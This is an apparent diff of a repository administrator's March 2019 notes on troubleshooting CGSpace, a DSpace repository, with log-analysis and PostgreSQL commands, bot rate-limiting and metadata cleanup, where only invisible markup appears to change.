    @@ -356,7 +356,7 @@ java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@55ba10b5 is c
     
  • (Update on 2019-03-23 to use correct grep query)
  • There are not too many connections currently in PostgreSQL:
  • -
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
    +
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
           6 dspaceApi
          10 dspaceCli
          15 dspaceWeb
    @@ -437,13 +437,13 @@ java.util.EmptyStackException
     
  • I ran DSpace’s cleanup task on CGSpace (linode18) and there were errors:
  • $ dspace cleanup -v
    -Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    -  Detail: Key (bitstream_id)=(164496) is still referenced from table "bundle".
    +Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    +  Detail: Key (bitstream_id)=(164496) is still referenced from table "bundle".
     
    • The solution is, as always:
    # su - postgres
    -$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (164496);'
    +$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (164496);'
     UPDATE 1
     

    2019-03-18

      @@ -474,7 +474,7 @@ $ wc -l 2019-03-18-subjects-unmatched.txt
    • Create and merge a pull request to update the controlled vocabulary for AGROVOC terms (#416)
    • We are getting the blank page issue on CGSpace again today and I see a large number of the “SQL QueryTable Error” in the DSpace log again (last time was 2019-03-15):
    -
    $ grep -c 'SQL QueryTable Error' dspace.log.2019-03-1[5678]
    +
    $ grep -c 'SQL QueryTable Error' dspace.log.2019-03-1[5678]
     dspace.log.2019-03-15:929
     dspace.log.2019-03-16:67
     dspace.log.2019-03-17:72
    @@ -482,9 +482,9 @@ dspace.log.2019-03-18:1038
     
    • Though WTF, this grep seems to be giving weird inaccurate results actually, and the real number of errors is much lower if I exclude the “binary file matches” result with -I:
    -
    $ grep -I 'SQL QueryTable Error' dspace.log.2019-03-18 | wc -l
    +
    $ grep -I 'SQL QueryTable Error' dspace.log.2019-03-18 | wc -l
     8
    -$ grep -I 'SQL QueryTable Error' dspace.log.2019-03-{08,14,15,16,17,18} | awk -F: '{print $1}' | sort | uniq -c
    +$ grep -I 'SQL QueryTable Error' dspace.log.2019-03-{08,14,15,16,17,18} | awk -F: '{print $1}' | sort | uniq -c
           9 dspace.log.2019-03-08
          25 dspace.log.2019-03-14
          12 dspace.log.2019-03-15
    @@ -504,22 +504,22 @@ java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@75eaa668 is c
     
    • There is a low number of connections to PostgreSQL currently:
    -
    $ psql -c 'select * from pg_stat_activity' | wc -l
    +
    $ psql -c 'select * from pg_stat_activity' | wc -l
     33
    -$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
    +$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
           6 dspaceApi
           7 dspaceCli
          15 dspaceWeb
     
    • I looked in the PostgreSQL logs, but all I see are a bunch of these errors going back two months to January:
    -
    2019-01-13 06:25:13.062 CET [9157] postgres@template1 ERROR:  column "waiting" does not exist at character 217
    +
    2019-01-13 06:25:13.062 CET [9157] postgres@template1 ERROR:  column "waiting" does not exist at character 217
     
    • This is unrelated and apparently due to Munin checking a column that was changed in PostgreSQL 9.6
    • I suspect that this issue with the blank pages might not be PostgreSQL after all, perhaps it’s a Cocoon thing?
    • Looking in the cocoon logs I see a large number of warnings about “Can not load requested doc” around 11AM and 12PM:
    -
    $ grep 'Can not load requested doc' cocoon.log.2019-03-18 | grep -oE '2019-03-18 [0-9]{2}:' | sort | uniq -c
    +
    $ grep 'Can not load requested doc' cocoon.log.2019-03-18 | grep -oE '2019-03-18 [0-9]{2}:' | sort | uniq -c
           2 2019-03-18 00:
           6 2019-03-18 02:
           3 2019-03-18 04:
    @@ -535,7 +535,7 @@ $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|ds
     
    • And a few days ago on 2019-03-15 when I happened last it was in the afternoon when it happened and the same pattern occurs then around 1–2PM:
    -
    $ xzgrep 'Can not load requested doc' cocoon.log.2019-03-15.xz | grep -oE '2019-03-15 [0-9]{2}:' | sort | uniq -c
    +
    $ xzgrep 'Can not load requested doc' cocoon.log.2019-03-15.xz | grep -oE '2019-03-15 [0-9]{2}:' | sort | uniq -c
           4 2019-03-15 01:
           3 2019-03-15 02:
           1 2019-03-15 03:
    @@ -561,7 +561,7 @@ $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|ds
     
    • And again on 2019-03-08, surprise surprise, it happened in the morning:
    -
    $ xzgrep 'Can not load requested doc' cocoon.log.2019-03-08.xz | grep -oE '2019-03-08 [0-9]{2}:' | sort | uniq -c
    +
    $ xzgrep 'Can not load requested doc' cocoon.log.2019-03-08.xz | grep -oE '2019-03-08 [0-9]{2}:' | sort | uniq -c
          11 2019-03-08 01:
           3 2019-03-08 02:
           1 2019-03-08 03:
    @@ -581,7 +581,7 @@ $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|ds
     
  • I found a handful of AGROVOC subjects that use a non-breaking space (0x00a0) instead of a regular space, which makes for a pretty confusing debugging…
  • I will replace these in the database immediately to save myself the headache later:
  • -
    dspace=# SELECT count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = 57 AND text_value ~ '.+\u00a0.+';
    +
    dspace=# SELECT count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = 57 AND text_value ~ '.+\u00a0.+';
      count 
     -------
         84
    @@ -630,7 +630,7 @@ Max realtime timeout      unlimited            unlimited            us
     
  • For now I will just stop Tomcat, delete Solr locks, then start Tomcat again:
  • # systemctl stop tomcat7
    -# find /home/cgspace.cgiar.org/solr/ -iname "*.lock" -delete
    +# find /home/cgspace.cgiar.org/solr/ -iname "*.lock" -delete
     # systemctl start tomcat7
     
    • After restarting I confirmed that all Solr statistics cores were loaded successfully…
    • @@ -660,10 +660,10 @@ Max realtime timeout unlimited unlimited us
      • It’s been two days since we had the blank page issue on CGSpace, and looking in the Cocoon logs I see very low numbers of the errors that we were seeing the last time the issue occurred:
      -
      $ grep 'Can not load requested doc' cocoon.log.2019-03-20 | grep -oE '2019-03-20 [0-9]{2}:' | sort | uniq -c
      +
      $ grep 'Can not load requested doc' cocoon.log.2019-03-20 | grep -oE '2019-03-20 [0-9]{2}:' | sort | uniq -c
             3 2019-03-20 00:
            12 2019-03-20 02:
      -$ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21 [0-9]{2}:' | sort | uniq -c
      +$ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21 [0-9]{2}:' | sort | uniq -c
             4 2019-03-21 00:
             1 2019-03-21 02:
             4 2019-03-21 03:
      @@ -704,7 +704,7 @@ $ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21
       
      • CGSpace (linode18) is having the blank page issue again and it seems to have started last night around 21:00:
      -
      $ grep 'Can not load requested doc' cocoon.log.2019-03-22 | grep -oE '2019-03-22 [0-9]{2}:' | sort | uniq -c
      +
      $ grep 'Can not load requested doc' cocoon.log.2019-03-22 | grep -oE '2019-03-22 [0-9]{2}:' | sort | uniq -c
             2 2019-03-22 00:
            69 2019-03-22 01:
             1 2019-03-22 02:
      @@ -727,7 +727,7 @@ $ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21
           323 2019-03-22 21:
           685 2019-03-22 22:
           357 2019-03-22 23:
      -$ grep 'Can not load requested doc' cocoon.log.2019-03-23 | grep -oE '2019-03-23 [0-9]{2}:' | sort | uniq -c
      +$ grep 'Can not load requested doc' cocoon.log.2019-03-23 | grep -oE '2019-03-23 [0-9]{2}:' | sort | uniq -c
           575 2019-03-23 00:
           445 2019-03-23 01:
           518 2019-03-23 02:
      @@ -742,7 +742,7 @@ $ grep 'Can not load requested doc' cocoon.log.2019-03-23 | grep -oE '2019-03-23
       
    • I was curious to see if clearing the Cocoon cache in the XMLUI control panel would fix it, but it didn’t
    • Trying to drill down more, I see that the bulk of the errors started aroundi 21:20:
    -
    $ grep 'Can not load requested doc' cocoon.log.2019-03-22 | grep -oE '2019-03-22 21:[0-9]' | sort | uniq -c
    +
    $ grep 'Can not load requested doc' cocoon.log.2019-03-22 | grep -oE '2019-03-22 21:[0-9]' | sort | uniq -c
           1 2019-03-22 21:0
           1 2019-03-22 21:1
          59 2019-03-22 21:2
    @@ -850,12 +850,12 @@ org.postgresql.util.PSQLException: This statement has been closed.
     
    • Could be an error in the docs, as I see the Apache Commons DBCP has -1 as the default
    • Maybe I need to re-evaluate the “defauts” of Tomcat 7’s DBCP and set them explicitly in our config
    • -
    • From Tomcat 8 they seem to default to Apache Commons' DBCP 2.x
    • +
    • From Tomcat 8 they seem to default to Apache Commons’ DBCP 2.x
  • Also, CGSpace doesn’t have many Cocoon errors yet this morning:
  • -
    $ grep 'Can not load requested doc' cocoon.log.2019-03-25 | grep -oE '2019-03-25 [0-9]{2}:' | sort | uniq -c
    +
    $ grep 'Can not load requested doc' cocoon.log.2019-03-25 | grep -oE '2019-03-25 [0-9]{2}:' | sort | uniq -c
           4 2019-03-25 00:
           1 2019-03-25 01:
     
      @@ -869,7 +869,7 @@ org.postgresql.util.PSQLException: This statement has been closed.
    • Uptime Robot reported that CGSpace went down and I see the load is very high
    • The top IPs around the time in the nginx API and web logs were:
    -
    # zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "25/Mar/2019:(18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "25/Mar/2019:(18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           9 190.252.43.162
          12 157.55.39.140
          18 157.55.39.54
    @@ -880,7 +880,7 @@ org.postgresql.util.PSQLException: This statement has been closed.
          36 157.55.39.9
          50 52.23.239.229
        2380 45.5.186.2
    -# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "25/Mar/2019:(18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "25/Mar/2019:(18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         354 18.195.78.144
         363 190.216.179.100
         386 40.77.167.185
    @@ -898,23 +898,23 @@ org.postgresql.util.PSQLException: This statement has been closed.
     
    • Surprisingly they are re-using their Tomcat session:
    -
    $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=93.179.69.74' dspace.log.2019-03-25 | sort | uniq | wc -l
    +
    $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=93.179.69.74' dspace.log.2019-03-25 | sort | uniq | wc -l
     1
     
    • That’s weird because the total number of sessions today seems low compared to recent days:
    -
    $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-25 | sort -u | wc -l
    +
    $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-25 | sort -u | wc -l
     5657
    -$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-24 | sort -u | wc -l
    +$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-24 | sort -u | wc -l
     17710
    -$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-23 | sort -u | wc -l
    +$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-23 | sort -u | wc -l
     17179
    -$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
    +$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
     7904
     
    • PostgreSQL seems to be pretty busy:
    -
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
    +
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
          11 dspaceApi
          10 dspaceCli
          67 dspaceWeb
    @@ -931,7 +931,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
     
  • UptimeRobot says CGSpace went down again and I see the load is again at 14.0!
  • Here are the top IPs in nginx logs in the last hour:
  • -
    # zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "26/Mar/2019:(06|07)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 
    +
    # zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "26/Mar/2019:(06|07)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 
           3 35.174.184.209
           3 66.249.66.81
           4 104.198.9.108
    @@ -942,7 +942,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
         414 45.5.184.72
         535 45.5.186.2
        2014 205.186.128.185
    -# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "26/Mar/2019:(06|07)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "26/Mar/2019:(06|07)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         157 41.204.190.40
         160 18.194.46.84
         160 54.70.40.11
    @@ -960,7 +960,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
     
  • I will add these three to the “bad bot” rate limiting that I originally used for Baidu
  • Going further, these are the IPs making requests to Discovery and Browse pages so far today:
  • -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "(discover|browse)" | grep -E "26/Mar/2019:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "(discover|browse)" | grep -E "26/Mar/2019:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         120 34.207.146.166
         128 3.91.79.74
         132 108.179.57.67
    @@ -978,7 +978,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
     
  • I can only hope that this helps the load go down because all this traffic is disrupting the service for normal users and well-behaved bots (and interrupting my dinner and breakfast)
  • Looking at the database usage I’m wondering why there are so many connections from the DSpace CLI:
  • -
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
    +
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
            5 dspaceApi
          10 dspaceCli
          13 dspaceWeb
    @@ -987,19 +987,19 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
     
  • Make a minor edit to my agrovoc-lookup.py script to match subject terms with parentheses like COCOA (PLANT)
  • Test 89 corrections and 79 deletions for AGROVOC subject terms from the ones I cleaned up in the last week
  • -
    $ ./fix-metadata-values.py -i /tmp/2019-03-26-AGROVOC-89-corrections.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d -n
    -$ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db dspace -u dspace -p 'fuuu' -m 57 -f dc.subject -d -n
    +
    $ ./fix-metadata-values.py -i /tmp/2019-03-26-AGROVOC-89-corrections.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d -n
    +$ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db dspace -u dspace -p 'fuuu' -m 57 -f dc.subject -d -n
     
    • UptimeRobot says CGSpace is down again, but it seems to just be slow, as the load is over 10.0
    • Looking at the nginx logs I don’t see anything terribly abusive, but SemrushBot has made ~3,000 requests to Discovery and Browse pages today:
    -
    # grep SemrushBot /var/log/nginx/access.log | grep -E "26/Mar/2019" | grep -E '(discover|browse)' | wc -l
    +
    # grep SemrushBot /var/log/nginx/access.log | grep -E "26/Mar/2019" | grep -E '(discover|browse)' | wc -l
     2931
     
    • So I’m adding it to the badbot rate limiting in nginx, and actually, I kinda feel like just blocking all user agents with “bot” in the name for a few days to see if things calm down… maybe not just yet
    • Otherwise, these are the top users in the web and API logs the last hour (18–19):
    -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "26/Mar/2019:(18|19)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "26/Mar/2019:(18|19)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 
          54 41.216.228.158
          65 199.47.87.140
          75 157.55.39.238
    @@ -1010,7 +1010,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
         277 2a01:4f8:13b:1296::2
         291 66.249.66.80
         328 35.174.184.209
    -# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "26/Mar/2019:(18|19)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "26/Mar/2019:(18|19)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           2 2409:4066:211:2caf:3c31:3fae:2212:19cc
           2 35.10.204.140
           2 45.251.231.45
    @@ -1025,7 +1025,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
     
  • For the XMLUI I see 18.195.78.144 and 18.196.196.108 requesting only CTA items and with no user agent
  • They are responsible for almost 1,000 XMLUI sessions today:
  • -
    $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=(18.195.78.144|18.196.196.108)' dspace.log.2019-03-26 | sort | uniq | wc -l
    +
    $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=(18.195.78.144|18.196.196.108)' dspace.log.2019-03-26 | sort | uniq | wc -l
     937
     
    • I will add their IPs to the list of bot IPs in nginx so I can tag them as bots to let Tomcat’s Crawler Session Manager Valve to force them to re-use their session
    • @@ -1033,7 +1033,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
    • I will add curl to the Tomcat Crawler Session Manager because anyone using curl is most likely an automated read-only request
    • I will add GuzzleHttp to the nginx badbots rate limiting, because it is making requests to dynamic Discovery pages
    -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep 45.5.184.72 | grep -E "26/Mar/2019:" | grep -E '(discover|browse)' | wc -l                                        
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep 45.5.184.72 | grep -E "26/Mar/2019:" | grep -E '(discover|browse)' | wc -l                                        
     119
     
    • What’s strange is that I can’t see any of their requests in the DSpace log…
    • @@ -1045,7 +1045,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
    • Run the corrections and deletions to AGROVOC (dc.subject) on DSpace Test and CGSpace, and then start a full re-index of Discovery
    • What the hell is going on with this CTA publication?
    -
    # grep Spore-192-EN-web.pdf /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -n
    +
    # grep Spore-192-EN-web.pdf /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -n
           1 37.48.65.147
           1 80.113.172.162
           2 108.174.5.117
    @@ -1077,7 +1077,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
     
     
  • In other news, I see that it’s not even the end of the month yet and we have 3.6 million hits already:
  • -
    # zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Mar/2019"
    +
    # zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Mar/2019"
     3654911
     
    • In other other news I see that DSpace has no statistics for years before 2019 currently, yet when I connect to Solr I see all the cores up
    • @@ -1105,7 +1105,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
    • It is frustrating to see that the load spikes for own own legitimate load on the server were very aggravated and drawn out by the contention for CPU on this host
    • We had 4.2 million hits this month according to the web server logs:
    -
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Mar/2019"
    +
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Mar/2019"
     4218841
     
     real    0m26.609s
    @@ -1114,7 +1114,7 @@ sys     0m2.551s
     
    • Interestingly, now that the CPU steal is not an issue the REST API is ten seconds faster than it was in 2018-10:
    -
    $ time http --print h 'https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
    +
    $ time http --print h 'https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
     ...
     0.33s user 0.07s system 2% cpu 17.167 total
     0.27s user 0.04s system 1% cpu 16.643 total
    @@ -1137,7 +1137,7 @@ sys     0m2.551s
     
  • Looking at the weird issue with shitloads of downloads on the CTA item again
  • The item was added on 2019-03-13 and these three IPs have attempted to download the item’s bitstream 43,000 times since it was added eighteen days ago:
  • -
    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.{2..17}.gz | grep 'Spore-192-EN-web.pdf' | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 5
    +
    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.{2..17}.gz | grep 'Spore-192-EN-web.pdf' | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 5
          42 196.43.180.134
         621 185.247.144.227
        8102 18.194.46.84
    @@ -1168,16 +1168,16 @@ sys     0m2.551s
     
     
     
    -
    _altmetric.embed_callback({"title":"Distilling the role of ecosystem services in the Sustainable Development Goals","doi":"10.1016/j.ecoser.2017.10.010","tq":["Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of","Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers","How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!","Excellent paper about the contribution of #ecosystemservices to SDGs","So great to work with amazing collaborators"],"altmetric_jid":"521611533cf058827c00000a","issns":["2212-0416"],"journal":"Ecosystem Services","cohorts":{"sci":58,"pub":239,"doc":3,"com":2},"context":{"all":{"count":12732768,"mean":7.8220956572788,"rank":56146,"pct":99,"higher_than":12676701},"journal":{"count":549,"mean":7.7567299270073,"rank":2,"pct":99,"higher_than":547},"similar_age_3m":{"count":386919,"mean":11.573702536454,"rank":3299,"pct":99,"higher_than":383619},"similar_age_journal_3m":{"count":28,"mean":9.5648148148148,"rank":1,"pct":96,"higher_than":27}},"authors":["Sylvia L.R. Wood","Sarah K. Jones","Justin A. Johnson","Kate A. Brauman","Rebecca Chaplin-Kramer","Alexander Fremier","Evan Girvetz","Line J. Gordon","Carrie V. Kappel","Lisa Mandle","Mark Mulligan","Patrick O'Farrell","William K. Smith","Louise Willemen","Wei Zhang","Fabrice A. DeClerck"],"type":"article","handles":["10568/89975","10568/89846"],"handle":"10568/89975","altmetric_id":29816439,"schema":"1.5.4","is_oa":false,"cited_by_posts_count":377,"cited_by_tweeters_count":302,"cited_by_fbwalls_count":1,"cited_by_gplus_count":1,"cited_by_policies_count":2,"cited_by_accounts_count":306,"last_updated":1554039125,"score":208.65,"history":{"1y":54.75,"6m":10.35,"3m":5.5,"1m":5.5,"1w":1.5,"6d":1.5,"5d":1.5,"4d":1.5,"3d":1.5,"2d":1,"1d":1,"at":208.65},"url":"http://dx.doi.org/10.1016/j.ecoser.2017.10.010","added_on":1512153726,"published_on":1517443200,"readers":{"citeulike":0,"mendeley":248,"connotea":0},"readers_count":248,"images":{"small":"https://badges.altmetric.com/?size=64&score=209&types=tttttfdg","medium":"https://badges.altmetric.com/?size=100&score=209&types=tttttfdg","large":"https://badges.altmetric.com/?size=180&score=209&types=tttttfdg"},"details_url":"http://www.altmetric.com/details.php?citation_id=29816439"})
    +
    _altmetric.embed_callback({"title":"Distilling the role of ecosystem services in the Sustainable Development Goals","doi":"10.1016/j.ecoser.2017.10.010","tq":["Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of","Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers","How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!","Excellent paper about the contribution of #ecosystemservices to SDGs","So great to work with amazing collaborators"],"altmetric_jid":"521611533cf058827c00000a","issns":["2212-0416"],"journal":"Ecosystem Services","cohorts":{"sci":58,"pub":239,"doc":3,"com":2},"context":{"all":{"count":12732768,"mean":7.8220956572788,"rank":56146,"pct":99,"higher_than":12676701},"journal":{"count":549,"mean":7.7567299270073,"rank":2,"pct":99,"higher_than":547},"similar_age_3m":{"count":386919,"mean":11.573702536454,"rank":3299,"pct":99,"higher_than":383619},"similar_age_journal_3m":{"count":28,"mean":9.5648148148148,"rank":1,"pct":96,"higher_than":27}},"authors":["Sylvia L.R. Wood","Sarah K. Jones","Justin A. Johnson","Kate A. Brauman","Rebecca Chaplin-Kramer","Alexander Fremier","Evan Girvetz","Line J. Gordon","Carrie V. Kappel","Lisa Mandle","Mark Mulligan","Patrick O'Farrell","William K. Smith","Louise Willemen","Wei Zhang","Fabrice A. DeClerck"],"type":"article","handles":["10568/89975","10568/89846"],"handle":"10568/89975","altmetric_id":29816439,"schema":"1.5.4","is_oa":false,"cited_by_posts_count":377,"cited_by_tweeters_count":302,"cited_by_fbwalls_count":1,"cited_by_gplus_count":1,"cited_by_policies_count":2,"cited_by_accounts_count":306,"last_updated":1554039125,"score":208.65,"history":{"1y":54.75,"6m":10.35,"3m":5.5,"1m":5.5,"1w":1.5,"6d":1.5,"5d":1.5,"4d":1.5,"3d":1.5,"2d":1,"1d":1,"at":208.65},"url":"http://dx.doi.org/10.1016/j.ecoser.2017.10.010","added_on":1512153726,"published_on":1517443200,"readers":{"citeulike":0,"mendeley":248,"connotea":0},"readers_count":248,"images":{"small":"https://badges.altmetric.com/?size=64&score=209&types=tttttfdg","medium":"https://badges.altmetric.com/?size=100&score=209&types=tttttfdg","large":"https://badges.altmetric.com/?size=180&score=209&types=tttttfdg"},"details_url":"http://www.altmetric.com/details.php?citation_id=29816439"})
     
    • The response paylod for the second one is the same:
    -
    _altmetric.embed_callback({"title":"Distilling the role of ecosystem services in the Sustainable Development Goals","doi":"10.1016/j.ecoser.2017.10.010","tq":["Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of","Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers","How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!","Excellent paper about the contribution of #ecosystemservices to SDGs","So great to work with amazing collaborators"],"altmetric_jid":"521611533cf058827c00000a","issns":["2212-0416"],"journal":"Ecosystem Services","cohorts":{"sci":58,"pub":239,"doc":3,"com":2},"context":{"all":{"count":12732768,"mean":7.8220956572788,"rank":56146,"pct":99,"higher_than":12676701},"journal":{"count":549,"mean":7.7567299270073,"rank":2,"pct":99,"higher_than":547},"similar_age_3m":{"count":386919,"mean":11.573702536454,"rank":3299,"pct":99,"higher_than":383619},"similar_age_journal_3m":{"count":28,"mean":9.5648148148148,"rank":1,"pct":96,"higher_than":27}},"authors":["Sylvia L.R. Wood","Sarah K. Jones","Justin A. Johnson","Kate A. Brauman","Rebecca Chaplin-Kramer","Alexander Fremier","Evan Girvetz","Line J. Gordon","Carrie V. Kappel","Lisa Mandle","Mark Mulligan","Patrick O'Farrell","William K. Smith","Louise Willemen","Wei Zhang","Fabrice A. DeClerck"],"type":"article","handles":["10568/89975","10568/89846"],"handle":"10568/89975","altmetric_id":29816439,"schema":"1.5.4","is_oa":false,"cited_by_posts_count":377,"cited_by_tweeters_count":302,"cited_by_fbwalls_count":1,"cited_by_gplus_count":1,"cited_by_policies_count":2,"cited_by_accounts_count":306,"last_updated":1554039125,"score":208.65,"history":{"1y":54.75,"6m":10.35,"3m":5.5,"1m":5.5,"1w":1.5,"6d":1.5,"5d":1.5,"4d":1.5,"3d":1.5,"2d":1,"1d":1,"at":208.65},"url":"http://dx.doi.org/10.1016/j.ecoser.2017.10.010","added_on":1512153726,"published_on":1517443200,"readers":{"citeulike":0,"mendeley":248,"connotea":0},"readers_count":248,"images":{"small":"https://badges.altmetric.com/?size=64&score=209&types=tttttfdg","medium":"https://badges.altmetric.com/?size=100&score=209&types=tttttfdg","large":"https://badges.altmetric.com/?size=180&score=209&types=tttttfdg"},"details_url":"http://www.altmetric.com/details.php?citation_id=29816439"})
    +
